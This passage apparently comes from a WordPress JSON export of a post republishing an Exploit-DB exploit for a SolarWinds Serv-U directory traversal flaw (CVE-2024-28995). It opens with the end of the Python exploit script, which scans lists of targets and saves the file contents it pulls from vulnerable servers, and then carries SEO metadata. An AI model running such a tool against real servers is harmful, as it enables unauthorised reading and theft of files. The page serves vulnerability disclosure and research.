print(f&#8221;{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>        sys.exit(1)<\/p>\n<p>    print(f&#8221;{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}&#8221;)<\/p>\n<p>    # Set output file<br \/>\n<br \/>    output_file = args.output or f&#8221;cve_2024_28995_results_{time.strftime(&#8216;%Y%m%d_%H%M%S&#8217;)}.json&#8221;<\/p>\n<p>    # Start scanning<br \/>\n<br \/>    results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist)<\/p>\n<p>    # Process results<br \/>\n<br \/>    vulnerable_count = sum(1 for result in results if result.is_vulnerable)<\/p>\n<p>    print(f&#8221;\\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>    print(f&#8221;{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>    print(f&#8221;{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}&#8221;)<\/p>\n<p>    # Save results<br \/>\n<br \/>    save_results(results, output_file)<\/p>\n<p>    # Save vulnerable file contents<br \/>\n<br \/>    for result in results:<br \/>\n<br \/>        if result.is_vulnerable and result.file_content:<br \/>\n<br \/>            save_vulnerable_content(result, &#8220;vulnerable_files&#8221;)<\/p>\n<p>    print(f&#8221;\\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>\n<br \/>    try:<br \/>\n<br \/>        main()<br \/>\n<br \/>    except KeyboardInterrupt:<br \/>\n<br \/>        print(f&#8221;\\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>        sys.exit(0)<br \/>\n<br \/>    except Exception as e:<br \/>\n<br \/>        print(f&#8221;\\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}&#8221;)<br \/>\n<br \/>        sys.exit(1)\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52311\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal Exploit ID EDB-ID:52311 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00 CVSS Information CVSS&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,81,12,40,15,13,7,11,5],"class_list":["post-6085","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-86","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=6085\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal Exploit ID EDB-ID:52311 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00 CVSS Information CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=6085\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-29T05:35:09+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6085#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6085\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal\",\"datePublished\":\"2025-05-29T05:35:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6085\"},\"wordCount\":1220,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.6\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6085#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6085\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6085\",\"name\":\"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-29T05:35:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6085#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=6085\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=6085#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=6085","og_locale":"en_US","og_type":"article","og_title":"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal - zero redgem","og_description":"Exploit Details Basic Information Exploit Title SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal Exploit ID EDB-ID:52311 Type exploitdb Published 2025-05-29T00:00:00 Modified 2025-05-29T00:00:00 CVSS Information CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=6085","og_site_name":"zero redgem","article_published_time":"2025-05-29T05:35:09+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=6085#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=6085"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal","datePublished":"2025-05-29T05:35:09+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=6085"},"wordCount":1220,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.6","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=6085#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=6085","url":"https:\/\/zero.redgem.net\/?p=6085","name":"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-29T05:35:09+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=6085#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=6085"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=6085#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"SolarWinds Serv-U 15.4.2 HF1 &#8211; Directory Traversal"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6085","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6085"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/6085\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6085"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6085"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6085"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}